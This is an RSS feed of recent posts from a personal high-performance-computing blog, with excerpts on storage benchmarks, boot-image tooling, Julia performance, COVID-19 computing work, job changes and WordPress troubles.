<?xml version="1.0" encoding="utf-8" standalone="yes"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
  <channel>
    <title>Posts on blog.scalability.org</title>
    <link>https://blog.scalability.org/posts/</link>
    <description>Recent content in Posts on blog.scalability.org</description>
    <generator>Hugo -- gohugo.io</generator>
    <language>en-us</language>
    <lastBuildDate>Sun, 08 Nov 2020 02:10:44 +0000</lastBuildDate><atom:link href="https://blog.scalability.org/posts/index.xml" rel="self" type="application/rss+xml" />
    <item>
      <title>On crushing older tests</title>
      <link>https://blog.scalability.org/2020/11/on-crushing-older-tests/</link>
      <pubDate>Sun, 08 Nov 2020 02:10:44 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2020/11/on-crushing-older-tests/</guid>
      <description>About 6 years ago, I wrote this, about a benchmark test that did a 2TB write in 73s or so, on pure spinning disk. That result was just so far out there, compared to pretty much anything else available, in terms of performance density (single rack of storage units). The hardware was Scalable Informatics Unison storage, designed to be an IO monster in all respects. It was. Way ahead of its time.</description>
    </item>
    
    <item>
      <title>On using legacy tooling in modern HPC systems</title>
      <link>https://blog.scalability.org/2020/11/on-using-legacy-tooling-in-modern-hpc-systems/</link>
      <pubDate>Tue, 03 Nov 2020 21:35:15 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2020/11/on-using-legacy-tooling-in-modern-hpc-systems/</guid>
      <description>Or as House MD may have put it
So there you are, working on a system with a group, when you realize that something is out of kilter. And you think to yourself &amp;hellip;
It’s not DNS
There is no way it's DNS
It was DNS
So your team works on resolving the issue. And the tooling they use &amp;hellip; the tooling.
Is from the late 80s/early 90s.
There are so many &amp;hellip; better &amp;hellip; easier to use &amp;hellip; tools.</description>
    </item>
    
    <item>
      <title>On risk and how to mitigate it</title>
      <link>https://blog.scalability.org/2020/10/on-risk-and-how-to-mitigate-it/</link>
      <pubDate>Wed, 28 Oct 2020 14:50:05 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2020/10/on-risk-and-how-to-mitigate-it/</guid>
      <description>On 1-March-2020, I wrote this article. In it I argued that the risk benefit/reward equations have been thrown out of kilter by the pandemic. Or rather than thrown out of kilter, maybe they are reverting to a more natural state, where risks that had previously been discounted are now showing their true (or more nearly true) values.
A former SGI colleague, and now HBS professor, Willy Shih, wrote a great article on how management might wish to adapt to this reconfiguration of risk strength/value.</description>
    </item>
    
    <item>
      <title>On zeros</title>
      <link>https://blog.scalability.org/2020/10/on-zeros/</link>
      <pubDate>Fri, 16 Oct 2020 18:53:15 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2020/10/on-zeros/</guid>
      <description>Not a math post, I promise. Really about teams.
You have a team of people. You have a mission. You have a (short) timeline. You need them to focus on the problem, and find the minimum temporal path length process to achieve a resolution. You have a process, albeit informal, to address issues, which is in place, functioning well, solving problems.
Then someone loops someone else into the effort. Who starts quoting chapter and verse out of how they would like it to work.</description>
    </item>
    
    <item>
      <title>Thoughts on configuration management vs image artefact management</title>
      <link>https://blog.scalability.org/2020/05/thoughts-on-configuration-management-vs-image-artefact-management/</link>
      <pubDate>Sat, 30 May 2020 21:07:18 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2020/05/thoughts-on-configuration-management-vs-image-artefact-management/</guid>
      <description>Years ago &amp;hellip; ok &amp;hellip; decades ago, when I was building my first large clusters, I worried about configuration and drift. OS installers are notoriously finicky, and one of the hard lessons is that you should spend absolutely as little time inside them as possible. Do the bare minimum work you need to get a functional system, and handle everything else after the first boot.
I actually learned this lesson at SGI, while writing Autoinst, a tool to handle large scale OS deployment.</description>
    </item>
    
    <item>
      <title>R.I.P. Rich</title>
      <link>https://blog.scalability.org/2020/05/r-i-p-rich/</link>
      <pubDate>Mon, 25 May 2020 02:26:41 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2020/05/r-i-p-rich/</guid>
      <description>The link to his obituary. A wonderful person, deeply insightful, excellent communicator. Gone too soon.
I will miss him. I think everyone in #HPC will.</description>
    </item>
    
    <item>
      <title>On optimizing scripting languages, and where they are useful and where they are not</title>
      <link>https://blog.scalability.org/2020/05/on-optimizing-scripting-languages-and-where-they-are-useful-and-where-they-are-not/</link>
      <pubDate>Thu, 21 May 2020 14:26:03 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2020/05/on-optimizing-scripting-languages-and-where-they-are-useful-and-where-they-are-not/</guid>
      <description>So yesterday, an article and discussion appeared on Hacker News. In the article, the author asks reasonable questions, of how to optimize a Python code. What happened next, probably wasn&amp;rsquo;t as they intended.
The article was, ostensibly, on optimizing Python code. After the 4th attempt at source-level optimization, it switched languages. It was no longer written in Python, this attempt to optimize &amp;hellip; Python code.
Ok. So the code they were &amp;ldquo;optimizing&amp;rdquo; was trivial, and not really indicative of any particular workload.</description>
    </item>
    
    <item>
      <title>Updating compressors for NyBLE</title>
      <link>https://blog.scalability.org/2020/05/updating-compressors-for-nyble/</link>
      <pubDate>Mon, 18 May 2020 00:55:56 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2020/05/updating-compressors-for-nyble/</guid>
      <description>Compressing tools like gzip and bzip2 have been around quite a long time. They are, well, mature. Almost boring. You depend upon them for many things.
You don&amp;rsquo;t really pay attention to them until you use them for significant work. Like with NyBLE, compression and decompression are important, and time sensitive steps &amp;hellip; well &amp;hellip; decompression is anyway &amp;hellip; in the boot process.
My preference is generally for tools that enable me to use the full processing power of an underlying machine.</description>
    </item>
    
    <item>
      <title>My urgent #HPC computational project, COVID-19 related</title>
      <link>https://blog.scalability.org/2020/05/my-urgent-hpc-computational-project-covid-19-related/</link>
      <pubDate>Tue, 05 May 2020 17:19:23 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2020/05/my-urgent-hpc-computational-project-covid-19-related/</guid>
      <description>This is the project that I alluded to. We tuned the system, the code, the environment. We wrote tooling to massively simplify job creation and submission. Moreover, we worked around numerous issues that arise in each technological layer.
Multiple simultaneous tools are being deployed to work on this, and I am hopeful that the net result will be a few small molecules that have action against this disease.</description>
    </item>
    
    <item>
      <title>Time to replace some hardware</title>
      <link>https://blog.scalability.org/2020/04/time-to-replace-some-hardware/</link>
      <pubDate>Wed, 29 Apr 2020 03:45:24 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2020/04/time-to-replace-some-hardware/</guid>
      <description>I built an updated RAID pair of drives with a brand new OS for the system that underlies this blog and other services. Basically, the previous system load had been updated from debian 7 through debian 9 and had accumulated lots of cruft. So I rebuilt this using my wonderful nyble system on a lab machine. I moved most of the config over from the live system.
Switched over and spent about 2 hours fixing up the missing services (things I forgot to enable, etc.</description>
    </item>
    
    <item>
      <title>Updated nyble to support ubuntu 20.04 LTS and debian 10</title>
      <link>https://blog.scalability.org/2020/04/updated-nyble-to-support-ubuntu-20-04-lts-and-debian-10/</link>
      <pubDate>Mon, 27 Apr 2020 20:40:03 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2020/04/updated-nyble-to-support-ubuntu-20-04-lts-and-debian-10/</guid>
      <description>For those who don&amp;rsquo;t know what nyble is &amp;hellip; you can read an old post here. The short version is that it gives you an always reproducible bootable ramdisk (or stateful if you need) image (installation for stateful folk). You avoid worrying about configuration drift, as you roll a new image in ~10-20 minutes, and turn a configuration management problem into a simpler image management problem. Which may be solved with a database backed booting system like, I dunno, tiburon with minio providing the data store.</description>
    </item>
    
    <item>
      <title>There are no silver bullets</title>
      <link>https://blog.scalability.org/2020/04/there-are-no-silver-bullets-2/</link>
      <pubDate>Sat, 25 Apr 2020 16:24:09 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2020/04/there-are-no-silver-bullets-2/</guid>
      <description>In the world in which we reside, a pandemic slowly burns. This pandemic has confounded front line medical practitioners and public health organizations. It has exposed a number of troubling relationships amongst governments and organizations. It has resulted in numerous pronouncements of &amp;ldquo;X may work&amp;rdquo; from medically and scientifically illiterate political leaders.
The problem is, fundamentally, there are no silver bullets. There are no magic cures.
There is no replacement for the hard work required to devise safe and effective mitigations, and hopefully preventatives such as vaccines.</description>
    </item>
    
    <item>
      <title>Performance of a julia code: Riemann ζ function implemented on CPU and GPU</title>
      <link>https://blog.scalability.org/2020/04/performance-of-a-julia-code-riemann-%ce%b6-function-implemented-on-cpu-and-gpu/</link>
      <pubDate>Sat, 25 Apr 2020 02:18:17 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2020/04/performance-of-a-julia-code-riemann-%ce%b6-function-implemented-on-cpu-and-gpu/</guid>
      <description>I&amp;rsquo;ve been playing with Julia for a while now. As the language is evolving quickly, I have to learn and relearn various aspects. Happily, since 1.0 dropped a while ago, it&amp;rsquo;s been more consistent, and the rate of change is lower than in the past.
The Riemann ζ function is an interesting problem to test a number of mechanisms for parallelism with. The function itself is simple to write
$$\zeta(a) = \sum_{i=1}^\infty \frac{1}{i^a}$$</description>
    </item>
    
    <item>
      <title>Topical #HPC project at the $dayjob</title>
      <link>https://blog.scalability.org/2020/04/fun-and-topical-hpc-project-at-the-dayjob/</link>
      <pubDate>Sat, 25 Apr 2020 00:58:32 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2020/04/fun-and-topical-hpc-project-at-the-dayjob/</guid>
      <description>(caution: I get personal at the end of this, you can see my motivation for working on this)
I can&amp;rsquo;t talk in depth about it though, yet. I can talk in broad brush strokes for now.
Imagine for a moment, that you have a combination of available high performance supercomputers, an urgent problem to be solved, and a collection of people, computing tools, and data. Imagine that you are one of many stages in this process, but you are, for the moment, a bottlenecking process.</description>
    </item>
    
    <item>
      <title>In the face of disruptive events</title>
      <link>https://blog.scalability.org/2020/03/in-the-face-of-disruptive-events/</link>
      <pubDate>Sun, 01 Mar 2020 16:01:24 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2020/03/in-the-face-of-disruptive-events/</guid>
      <description>As of the day this post is being written, a virus has been spreading globally. Details of the virus (SARS-CoV-2) and its spread (nCoV-19) are being discussed across the globe. There is much in the way of fear, and fear-inspired reactions. Visit any airport, and note the number of people wearing what amounts to ineffectual face masks. All the while, doctors are trying to get common sense messages out about prevention and preparation.</description>
    </item>
    
    <item>
      <title>Whats coming in #HPC</title>
      <link>https://blog.scalability.org/2020/01/whats-coming-in-hpc/</link>
      <pubDate>Thu, 02 Jan 2020 17:06:01 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2020/01/whats-coming-in-hpc/</guid>
      <description>I am planning on getting back to a more regular cadence of writing. I enjoy it, and hopefully, I don&amp;rsquo;t annoy (all) readers.
A brief retrospective on what has been over the last decade first.
First, having experienced this first hand, it&amp;rsquo;s important to talk about the use pattern shifts. In 2010, cloud for HPC workloads wasn&amp;rsquo;t even an afterthought. Basically the large cloud provider (AWS) and the wannabes were building cheap machines and maximizing tenancy.</description>
    </item>
    
    <item>
      <title>Updated io-bm and results from system I was working on</title>
      <link>https://blog.scalability.org/2019/12/updated-io-bm-and-results-from-system-i-was-working-on/</link>
      <pubDate>Fri, 20 Dec 2019 18:29:24 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2019/12/updated-io-bm-and-results-from-system-i-was-working-on/</guid>
      <description>For those who aren&amp;rsquo;t aware, I had written (a long, long time ago) a simple IO benchmark test, when I had been displeased with the (at the time) standard tools. Since then fio has come out and been quite useful, though somewhat orthogonal to what I wanted to use.
The new results are at the bottom.
Let me explain. At a high level, you want your test runs on your IO system to place your system under heavy sustained load, to explore the holistic system behavior.</description>
    </item>
    
    <item>
      <title>On the importance of saying &#34;no&#34;</title>
      <link>https://blog.scalability.org/2019/12/on-the-importance-of-saying-no/</link>
      <pubDate>Fri, 20 Dec 2019 16:40:24 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2019/12/on-the-importance-of-saying-no/</guid>
      <description>Often times, when we are working on a project with a well defined set of milestones, we&amp;rsquo;ll be asked to add something to the list of tasks. These asks may be simple and quick, or long and time consuming.
One thing each ask does is increase the scoping of the milestone, increase the risk surface, and add additional criteria to the milestone. This means each ask needs careful thought on the net increase in risk versus the net increase in value, or the net loss to opportunity cost by not acting on the ask.</description>
    </item>
    
    <item>
      <title>Updated net-tools with fixes and license change</title>
      <link>https://blog.scalability.org/2019/12/updated-net-tools-with-fixes-and-license-change/</link>
      <pubDate>Thu, 05 Dec 2019 00:29:38 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2019/12/updated-net-tools-with-fixes-and-license-change/</guid>
      <description>It&amp;rsquo;s been a while, I know. My apologies.
Ok, first off, I&amp;rsquo;ve been very busy at the $dayjob. More in a later post. But I&amp;rsquo;ve been doing some code fix up for a number of my tools, specifically the net-tools collection. This one had nagged me a long time.
Ok, here it is in a nutshell. The way lsnet worked, it used fixed sized columns for, unfortunately, variable sized fields.</description>
    </item>
    
    <item>
      <title>Apologies for the long delay in posting</title>
      <link>https://blog.scalability.org/2019/08/apologies-for-the-long-delay-in-posting/</link>
      <pubDate>Thu, 29 Aug 2019 03:16:29 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2019/08/apologies-for-the-long-delay-in-posting/</guid>
      <description>I have to be quite careful to not discuss $dayjob stuff here. Which, as that consumes a large chunk of my daytime (a bit more than 8h/day), leaves me with precious little time for me.
But I enjoy this position, and the company. It is nice to be part of an organization that values (deep) experience.</description>
    </item>
    
    <item>
      <title>When you see someone deploying a business model very similar to one you had developed on your own ...</title>
      <link>https://blog.scalability.org/2019/05/when-you-see-someone-deploying-a-business-model-very-similar-to-one-you-had-developed-on-your-own/</link>
      <pubDate>Fri, 24 May 2019 04:12:11 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2019/05/when-you-see-someone-deploying-a-business-model-very-similar-to-one-you-had-developed-on-your-own/</guid>
      <description>I learned today, of the HPE Greenlake flex system. It has a nice infographic which describes it. What struck me, was that this was a model very similar to something I had worked on in 2014-2015, that I had been trying to raise capital to execute against, at Scalable Informatics (RIP).
The question the VCs put to us was: will this model work? My model had a number of elements beyond this; in that sense, this is a smaller version of what I had envisioned.</description>
    </item>
    
    <item>
      <title>Length and complexity of supply chain as a risk factor for HPC and storage</title>
      <link>https://blog.scalability.org/2019/05/length-and-complexity-of-supply-chain-as-a-risk-factor-for-hpc-and-storage/</link>
      <pubDate>Thu, 23 May 2019 16:00:11 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2019/05/length-and-complexity-of-supply-chain-as-a-risk-factor-for-hpc-and-storage/</guid>
      <description>We&amp;rsquo;ve seen issues in the past, with massive flooding in Thailand, wreaking havoc on critical components in supply chains. The subsequent demonstration of the basic economics laws of supply and demand did not make users or vendors very happy.
This arose due to a significant over-allocation of one small geographical region to a critical component in offerings. To a degree, this also pushed companies to start looking at how to make this &amp;ldquo;Somebody Else&amp;rsquo;s Problem&amp;rdquo; (e.</description>
    </item>
    
    <item>
      <title>Slightly more complexity than I had thought, or RTFM!</title>
      <link>https://blog.scalability.org/2019/05/slightly-more-complexity-than-i-had-thought-or-rtfm/</link>
      <pubDate>Thu, 23 May 2019 15:35:17 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2019/05/slightly-more-complexity-than-i-had-thought-or-rtfm/</guid>
      <description>[mathjax]
So I&amp;rsquo;m playing with Julia in my off time to get more proficient with it. Doing some &amp;ldquo;simple&amp;rdquo; things in preparation for the work I want to do.
One of the things I like to play with is an environment&amp;rsquo;s linear algebra capabilities. This was one of my favorite areas as an undergraduate (cringe) years ago, and has been an important tool for me throughout my previous pre-professional career, working on a Ph.</description>
    </item>
    
    <item>
      <title>Nyble FTW! Installing my rambooted environment on linux laptop for rescue with grub</title>
      <link>https://blog.scalability.org/2019/05/nyble-ftw-installing-my-rambooted-environment-on-linux-laptop-for-rescue-with-grub/</link>
      <pubDate>Fri, 10 May 2019 16:57:23 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2019/05/nyble-ftw-installing-my-rambooted-environment-on-linux-laptop-for-rescue-with-grub/</guid>
      <description>Ok, this came about from many hours &amp;hellip; HOURS &amp;hellip; of not being able to get rescue CD images to boot correctly on my laptop, or in VMs. Things were broken on them, that I could not fix.
That&amp;rsquo;s when the thought occurred to me &amp;hellip; hey &amp;hellip; I&amp;rsquo;d developed this great project nyble (pronounced nibble), with which I build full linux environments from baseline distros (currently debian9, CentOS7, Ubuntu18.04), which can be trivially PXE booted, USB booted, or local install booted.</description>
    </item>
    
    <item>
      <title>displayport KVMs for sharing monitors and keyboards</title>
      <link>https://blog.scalability.org/2019/05/displayport-kvms-for-sharing-monitors-and-keyboards/</link>
      <pubDate>Fri, 10 May 2019 16:16:08 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2019/05/displayport-kvms-for-sharing-monitors-and-keyboards/</guid>
      <description>I&amp;rsquo;ve got a pair of Samsung 28 inch 4k monitors that I use for my daily environment. I have 3 (actually 4) machines to share them between, 2(3) linux boxen and 1 Mac laptop.
In my original design, pre-KVM switch, I had one monitor dedicated to the Mac, and one switched with the annoying little joystick at the back of the monitor, with a little set of 3 USB cords, a powered USB hub, and simple plugging/unplugging.</description>
    </item>
    
    <item>
      <title>Joining @cray_inc to help drive #HPC solutions in the #cloud</title>
      <link>https://blog.scalability.org/2019/04/joining-cray_inc-to-help-drive-hpc-solutions-in-the-cloud/</link>
      <pubDate>Sun, 14 Apr 2019 21:49:50 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2019/04/joining-cray_inc-to-help-drive-hpc-solutions-in-the-cloud/</guid>
      <description>Quick post &amp;hellip; I&amp;rsquo;m excited to note that I&amp;rsquo;ll be joining Cray, the preeminent HPC company, to help develop solutions for HPC customers to consume supercomputing resources in the cloud. I start the week of 22-April.
More soon, but I gotta say, I&amp;rsquo;m quite excited about this!</description>
    </item>
    
    <item>
      <title>Paint splatters as Perl programs?</title>
      <link>https://blog.scalability.org/2019/04/paint-splatters-as-perl-programs/</link>
      <pubDate>Fri, 05 Apr 2019 02:30:01 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2019/04/paint-splatters-as-perl-programs/</guid>
      <description>So I saw this, and yes, it is quite funny. There&amp;rsquo;s a discussion of this at HackerNews, which seems to follow a number of conventional pathways. Most of them missing the obvious implied humor.</description>
    </item>
    
    <item>
      <title>Onward and upward in #HPC</title>
      <link>https://blog.scalability.org/2019/04/onward-and-upward-in-hpc/</link>
      <pubDate>Thu, 04 Apr 2019 21:23:31 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2019/04/onward-and-upward-in-hpc/</guid>
      <description>A short note - today was my last day with Joyent. They are a wonderful company, building great things. Excellent technology, and technologists. I wish them nothing but success.
For the immediate future, I&amp;rsquo;ll be working on consulting projects, as well as looking for the next great opportunity within high performance computing, storage, cloud.
I&amp;rsquo;m always reachable here or at joe @ nlytiq . com</description>
    </item>
    
    <item>
      <title>Note to self: have only one blog VM running</title>
      <link>https://blog.scalability.org/2019/03/note-to-self-have-only-one-blog-vm-running/</link>
      <pubDate>Tue, 26 Mar 2019 19:42:46 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2019/03/note-to-self-have-only-one-blog-vm-running/</guid>
      <description>Yeah &amp;hellip; this was a fun one. Because I only recently started using a holistic VM management/control plane for my home machines, I didn&amp;rsquo;t notice that I had 2 VMs of the blog running.
I was doing some surgery to fix something, then tailed the logs &amp;hellip; and didn&amp;rsquo;t see the traffic.
Took me a little sanity checking, like, a quick poweroff and forcefully refreshing the page. Since the DB is on a different machine, the blog frontends were acting independently.</description>
    </item>
    
    <item>
      <title>Data loss, thanks to buggy driver or hardware</title>
      <link>https://blog.scalability.org/2019/02/data-loss-thanks-to-buggy-driver-or-hardware/</link>
      <pubDate>Wed, 06 Feb 2019 17:41:41 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2019/02/data-loss-thanks-to-buggy-driver-or-hardware/</guid>
      <description>So this happened on the 3rd, on one of my systems
Feb 3 03:02:39 calculon kernel: [195271.041118] INFO: task kworker/20:2:757 blocked for more than 120 seconds.
Feb 3 03:02:39 calculon kernel: [195271.048116] Not tainted 4.20.6.nlytiq #1
Feb 3 03:02:39 calculon kernel: [195271.052678] &amp;quot;echo 0 &amp;gt; /proc/sys/kernel/hung_task_timeout_secs&amp;quot; disables this message.
Feb 3 03:02:39 calculon kernel: [195271.060626] kworker/20:2 D 0 757 2 0x80000000
Feb 3 03:02:39 calculon kernel: [195271.066238] Workqueue: md submit_flushes [md_mod]
Feb 3 03:02:39 calculon kernel: [195271.</description>
    </item>
    
    <item>
      <title>Interesting articles on systemd and ZFS</title>
      <link>https://blog.scalability.org/2019/01/interesting-articles-on-systemd-and-zfs/</link>
      <pubDate>Tue, 29 Jan 2019 01:36:48 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2019/01/interesting-articles-on-systemd-and-zfs/</guid>
      <description>The systemd article is on LWN, and discusses the &amp;ldquo;tragedy&amp;rdquo; of it. The ZFS post was linked from HackerNews and discusses risk to ZFS&amp;rsquo;s future from the perspective of FreeBSD leveraging ZFS on Linux as its upstream.
Ok, first onto systemd. For those who don&amp;rsquo;t know systemd, think of it as the borg that ate init. And upstart. And &amp;hellip; Basically, it is a replacement infrastructure for running services on Linux.</description>
    </item>
    
    <item>
      <title>Reflections on where we&#39;ve been in HPC, and thoughts on where we are going</title>
      <link>https://blog.scalability.org/2019/01/reflections-on-where-weve-been-in-hpc-and-thoughts-on-where-we-are-going/</link>
      <pubDate>Sun, 20 Jan 2019 20:28:17 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2019/01/reflections-on-where-weve-been-in-hpc-and-thoughts-on-where-we-are-going/</guid>
      <description>Looking back on past reviews from 2013 and a few other posts, and what has changed since then up to 2019 (it&amp;rsquo;s early, I know), I am struck by a particular thought I&amp;rsquo;ve expressed for decades now.
In 2009 I wrote
  Down market, in this case, means wider use &amp;hellip; explicit or implicit &amp;hellip; integrated in more business processes. All the while, becoming orders of magnitude less expensive per computational operation, easier to use and interface with.</description>
    </item>
    
    <item>
      <title>Systems that are designed to fail, often do</title>
      <link>https://blog.scalability.org/2018/12/systems-that-are-designed-to-fail-often-do/</link>
      <pubDate>Tue, 18 Dec 2018 05:32:14 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2018/12/systems-that-are-designed-to-fail-often-do/</guid>
      <description>I&amp;rsquo;ve been saying this for mumble decades. What I mean by &amp;ldquo;designed to fail&amp;rdquo; isn&amp;rsquo;t specifically that someone wants a system to fail. Rather, by various interactions, wishful thinking, drinking of one&amp;rsquo;s own kool-aid, a system is placed on an inexorable path to failure. Without something to divert it in time, failure is the most probable outcome.
Watching these failures unfold can strike terror in one&amp;rsquo;s heart. Especially when you realize that you yourself have not been able to nudge the system onto a sane path.</description>
    </item>
    
    <item>
      <title>With every update, MacOSX becomes harder to build for</title>
      <link>https://blog.scalability.org/2018/12/with-every-update-macosx-becomes-harder-to-build-for/</link>
      <pubDate>Sun, 02 Dec 2018 20:25:41 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2018/12/with-every-update-macosx-becomes-harder-to-build-for/</guid>
      <description>Way back in the good old 90s, we had very different versions of various unix systems. SunOS/Solaris, Irix, AIX, HP/UX, this upstart Linux, and some BSD things floating about. Of course, Windows NT and others were starting to peek out then, and they had a &amp;ldquo;POSIX subsystem&amp;rdquo;.
Cross platform builds were generally speaking, a nightmare. While POSIX is a spec, writing to it didn&amp;rsquo;t guarantee that your application would work on a range of machines and OSes.</description>
    </item>
    
    <item>
      <title>Opening keynote @Supercomputing #SC18 : #HPC is an enabling technology ...</title>
      <link>https://blog.scalability.org/2018/11/opening-keynote-supercomputing-sc18-hpc-is-an-enabling-technology/</link>
      <pubDate>Tue, 13 Nov 2018 16:24:43 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2018/11/opening-keynote-supercomputing-sc18-hpc-is-an-enabling-technology/</guid>
      <description>&amp;hellip; Ok, the speaker said far more than that. But one of his central theses is that in this &amp;ldquo;second&amp;rdquo; machine revolution, we are enabling data driven decision making, distributed decision and consensus, as well as expanding beyond the confines of specific expertise in a field. The latter I&amp;rsquo;ve heard described as cross fertilization &amp;hellip; gather a bunch of smart people &amp;ldquo;together&amp;rdquo; and give them a problem spec. Let them run with it.</description>
    </item>
    
    <item>
      <title>#HPC in all the things</title>
      <link>https://blog.scalability.org/2018/11/hpc-in-all-the-things/</link>
      <pubDate>Fri, 09 Nov 2018 16:59:25 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2018/11/hpc-in-all-the-things/</guid>
      <description>I read this announcement this morning. Our friends at Facebook releasing their reduced precision server side convolution and GEMM operations.
Many years ago, I tried to convince people that HPC moves both down market, into lower cost hardware, as well as more widely into more software toolchains. Basically, the decades of experience building very high performance applications and systems will have value downstream for many users over time.
GEMM is a generalized approach to a matrix multiply, which has been well optimized for HPC applications in various scientific libraries over time.</description>
    </item>
    
    <item>
      <title>Looking forward to #SC18 next week and a discussion of all things #HPC</title>
      <link>https://blog.scalability.org/2018/11/looking-forward-to-sc18-next-week-and-a-discussion-of-all-things-hpc/</link>
      <pubDate>Tue, 06 Nov 2018 16:19:42 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2018/11/looking-forward-to-sc18-next-week-and-a-discussion-of-all-things-hpc/</guid>
      <description>I&amp;rsquo;m attending SC18 next week. It&amp;rsquo;s been 3 years since I last attended (2015). Then we (@scalableinfo) had a large booth, lots of traffic, and showed off some of the first commercial NVMe high performance storage systems running BeeGFS over 100GbE.
I am looking forward to talking with as many people as I can, to get their perspectives on things. To see what they are thinking, hear what they are doing, and in which direction they are going.</description>
    </item>
    
    <item>
      <title>A bug in s3 buckets with no apparent way to request support to deal with it</title>
      <link>https://blog.scalability.org/2018/09/a-bug-in-s3-buckets-with-no-apparent-way-to-request-support-to-deal-with-it/</link>
      <pubDate>Tue, 25 Sep 2018 16:39:29 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2018/09/a-bug-in-s3-buckets-with-no-apparent-way-to-request-support-to-deal-with-it/</guid>
      <description>This is a fun one that I&amp;rsquo;ve been playing with for the last 5 days or so. I&amp;rsquo;m helping someone out with backups, and they changed their mind on what they wanted backed up. So I started deleting the backups they didn&amp;rsquo;t want.
One of the machines contained a set of directories for hashdeep which includes a number of test cases. One set of test cases is deeply linked directories.
So, the aws s3 cp /localpath s3://yadda/yadda --recursive  copied this and many other files up to the bucket.</description>
    </item>
    
    <item>
      <title>Finally posted Tiburon on github</title>
      <link>https://blog.scalability.org/2018/08/finally-posted-tiburon-on-github/</link>
      <pubDate>Tue, 21 Aug 2018 14:53:02 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2018/08/finally-posted-tiburon-on-github/</guid>
      <description>Tiburon specifically solves the problem of stateful vs stateless boots, roll forward/backwards in images, consistent booting with immutable images. Coupled with an image generator and a programmatic config environment (as in Nyble and other tools), you have the workings of the non storage/networking parts of a cloud or cluster manager.
The philosophy behind this has to do with the pain associated with config/OS drift, failed upgrades/roll backs, failed boot drives, etc.</description>
    </item>
    
    <item>
      <title>Well ... that was fun</title>
      <link>https://blog.scalability.org/2018/08/well-that-was-fun-2/</link>
      <pubDate>Thu, 02 Aug 2018 06:00:13 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2018/08/well-that-was-fun-2/</guid>
      <description>So &amp;hellip; I&amp;rsquo;ve had this blog since 2005. I installed it from original sources. And WP made upgrades quite painless in the 2.x time frame.
Or so it seemed.
Slowly, over time, some configuration/settings/whatever got out of whack. And with the last update, from a system originally installed in final form in 2013 or so, something broke.
I am not sure what. But the symptoms were simple &amp;hellip; new posts would replace the most recent posts.</description>
    </item>
    
    <item>
      <title>Wordpress is recovering (was very sick)</title>
      <link>https://blog.scalability.org/2018/08/qweqwe/</link>
      <pubDate>Wed, 01 Aug 2018 15:15:55 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2018/08/qweqwe/</guid>
      <description>Please note: Wordpress appears to be failing badly at this stage. I&amp;rsquo;ll be working on a fix this week, and likely will create a new site out of different, less buggy code. I&amp;rsquo;ve checked the DB, moved it to a different machine, restored from a known working backup. It appears a recent update of WP managed to completely screw up post handling. I disabled all plugins, ran health checks, etc. I&amp;rsquo;ve cleaned cookies, browsing history, used different browsers on different machines, with exactly the same outcome.</description>
    </item>
    
    <item>
      <title>So I&#39;ve got ideas for two businesses</title>
      <link>https://blog.scalability.org/2018/07/so-ive-got-ideas-for-two-businesses/</link>
      <pubDate>Wed, 25 Jul 2018 03:13:21 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2018/07/so-ive-got-ideas-for-two-businesses/</guid>
      <description>Neither one is computer related. Both are based upon what I see as unmet needs for various groups. One is definitely a &amp;ldquo;gotta have&amp;rdquo; for one group. For the other group, there is one &amp;ldquo;solution&amp;rdquo; on the market that I looked at, and it&amp;rsquo;s pretty pathetic. The other uses technology where it should be using chemistry, as the tech is simply way too expensive for mass use, and quite inflexible. Both are B2C.</description>
    </item>
    
    <item>
      <title>Typecasting and the &#34;trust us&#34; factor</title>
      <link>https://blog.scalability.org/2018/07/typecasting-and-the-trust-us-factor/</link>
      <pubDate>Wed, 18 Jul 2018 23:24:26 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2018/07/typecasting-and-the-trust-us-factor/</guid>
      <description>Finding myself on the other side of the table in the consumer-vendor relationship has resulted in some eye opening experiences. These are things I look back on, and realize that I strenuously avoided doing during my Scalable days. But I see everyone doing it now, as they try to sell me stuff, or convince me to use things. One of the eye opening things is a bit of typecasting of sorts.</description>
    </item>
    
    <item>
      <title>How to handle curious conversations ... part 1 of a few billion</title>
      <link>https://blog.scalability.org/2018/06/how-to-handle-curious-conversations-part-1-of-a-few-billion/</link>
      <pubDate>Tue, 05 Jun 2018 17:22:08 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2018/06/how-to-handle-curious-conversations-part-1-of-a-few-billion/</guid>
